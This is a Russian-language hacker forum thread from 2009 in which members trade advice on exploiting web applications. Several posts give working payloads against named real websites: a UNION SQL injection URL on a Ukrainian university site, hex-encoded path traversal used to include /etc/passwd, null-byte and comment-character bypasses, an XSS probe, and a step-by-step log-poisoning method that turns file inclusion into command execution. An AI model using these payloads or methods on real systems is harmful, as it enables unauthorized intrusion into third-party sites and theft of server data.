Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. prescott

    prescott Elder - Старейшина

    Joined:
    28 Jul 2008
    Messages:
    132
    Likes Received:
    43
    Reputations:
    5
    Подскажите возможные пути к httpd.conf апача, не могу найти и все тут.
     
  2. Qwazar

    Qwazar Elder - Старейшина

    Joined:
    2 Jun 2005
    Messages:
    989
    Likes Received:
    904
    Reputations:
    587
    2 people like this.
  3. YoriK

    YoriK Elder - Старейшина

    Joined:
    12 Sep 2006
    Messages:
    33
    Likes Received:
    1
    Reputations:
    0
    Нашёл инъекцию, но после запроса select в скрипте идет запрос update и вылетает ошибка синтаксиса с запросом:

    SELECT * FROM news WHERE type='show' AND id=-32 union select 1,2,3,4,5,6,7,8,9,10 from users
    UPDATE news SET count='33' WHERE id=-32 union select 1,2,3,4,5,6,7,8,9,10 from users

    поле id обрабатывается функцией addslash() и into output не прокатит. Подскажите, как можно посмотреть данные минуя ошибку.
     
  4. VITАL

    VITАL Elder - Старейшина

    Joined:
    19 Aug 2008
    Messages:
    1
    Likes Received:
    25
    Reputations:
    10
    YoriK
    SELECT * FROM news WHERE type='show' AND id=32 and 2=1 union select 1,2,3,4,5,6,7,8,9,1100 from users%23
    почему не канает?

    10 колонок, после апдейта вывод в 10
     
    #9384 VITАL, 20 Oct 2009
    Last edited: 20 Oct 2009
    2 people like this.
  5. Byrger

    Byrger Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    521
    Likes Received:
    26
    Reputations:
    -4
    Если в уязвимом скрипте идёт инклуд типа
    PHP:
    include("pages/$_GET[act].php");
    То можно провести внешний инклуд?
     
    #9385 Byrger, 20 Oct 2009
    Last edited: 20 Oct 2009
  6. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
  7. Byrger

    Byrger Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    521
    Likes Received:
    26
    Reputations:
    -4
    А что можно полезного тогда получить из него если на машине Линукс?
     
  8. SeNaP

    SeNaP Elder - Старейшина

    Joined:
    7 Aug 2008
    Messages:
    378
    Likes Received:
    69
    Reputations:
    20
    https://forum.antichat.ru/thread12123.html
     
  9. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    Всё то же самое что и при удаленном. Просто потребуется немного больше времени и немного больше навыков.
     
    1 person likes this.
  10. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    588
    Likes Received:
    485
    Reputations:
    176
    тут нормальная не блайнд инъекция
    http://www.univd.edu.ua/document/index.php?id_doc=123+and+1=4+union+select+database(),2,3,4,5--+-&lan=ukr
     
  11. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    588
    Likes Received:
    485
    Reputations:
    176
    о ептыть тут еще инклуд есть
    http://www.univd.edu.ua/document/index.php?id_doc=123+and+1=4+union+select+database(),0x2E2E2F2E2E2F2E2E2F2E2E2F2E2E2F6574632F706173737764,3,4,5--+-&lan=ukr
     
    1 person likes this.
  12. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    Мало информации.
    А вообще можно, нулл байт тебе в руки! (%00, %0A, %0D)
     
    1 person likes this.
  13. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    588
    Likes Received:
    485
    Reputations:
    176
    в php-файле, который исполняется есть строчки примерно такие:
    PHP:
    mysql_query("select pole1,pole2 from table1 where id_doc=".$_GET[id_doc]);
    далее
    $pole2 = присваивается значение 2 поля.
    после этого идёт локаьный инклуд файла
    PHP:
    main('../'.$pole2);
    Мы запросом
    PHP:
    http://www.univd.edu.ua/document/index.php?id_doc=123+and+1=4+union+select+database(),0x2E2E2F2E2E2F2E2E2F2E2E2F2E2E2F6574632F706173737764,3,4,5--+-&lan=ukr
    делаем так, чтобы основной запрос вернул ложь, а UNION SELECT запрос вернул данные которые нам нужны.
    В поле, значение которого потом инклудится, вносим HEX значение строки, так как с ковычками не получилось.
    PHP:
    0x2E2E2F2E2E2F2E2E2F2E2E2F2E2E2F6574632F706173737764
    это равно
    ../../../../../etc/passwd
    соответственно, подставляя во 2 поле в sql-injection путь до искомого файла, он инклудится.
    Что непонятно - спрашивай.
     
    #9393 AFoST, 21 Oct 2009
    Last edited: 21 Oct 2009
    2 people like this.
  14. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    Хотя бы есть выбор:
    --
    {
    %23
    #
     
    2 people like this.
  15. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    588
    Likes Received:
    485
    Reputations:
    176
    1. форум античата в длинных строках вставляет пробелы.
    2. А про local file include почитай на форуме есть. Скажу одно - это огромный плюс!
     
    1 person likes this.
  16. bons

    bons Elder - Старейшина

    Joined:
    20 Dec 2007
    Messages:
    286
    Likes Received:
    121
    Reputations:
    21
    скобка не есть комментарий
    файл passwd даст список юзеров системы, а иногда эта информация может помочь.
     
  17. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    588
    Likes Received:
    485
    Reputations:
    176
    Да, это известный прием инклуда лог файла.
    1. находим инклуд
    2. находим логи /path/log/access_log
    3. запрос с cmd на сайт http://site/? ...
    4. инклудим через инклуд, найденный в п.1. access_log
    http://site/include.php?include=/path/log/acces_log&cmd=ls+-lia

    upd ты права таким способом не поднимаешь, ты просто выполняешь php.

    ps Изъясняй мысли правильней!!! Я с 5го прочтения тебя понимаю!!!
     
    #9397 AFoST, 21 Oct 2009
    Last edited: 21 Oct 2009
  18. Totgeliebt

    Totgeliebt New Member

    Joined:
    20 Oct 2009
    Messages:
    37
    Likes Received:
    1
    Reputations:
    0
    Вот посмотрите пожалуйста, мне кажется это пассивная XSS?просто я в этом вообще не разбераюсь =))
    http://la2.sz.ru/news.php?%22%3E%3Cscript%3Ealert()%3C/script%3Ereadmore=99
     
  19. gisTy

    gisTy Elder - Старейшина

    Joined:
    24 May 2008
    Messages:
    432
    Likes Received:
    160
    Reputations:
    27
    нет
     
    1 person likes this.
  20. DeluxeS

    DeluxeS Member

    Joined:
    1 Aug 2009
    Messages:
    7
    Likes Received:
    81
    Reputations:
    19
    Подкиньте статей по LFI. А то ничего найти не могу =(
     
Thread Status:
Not open for further replies.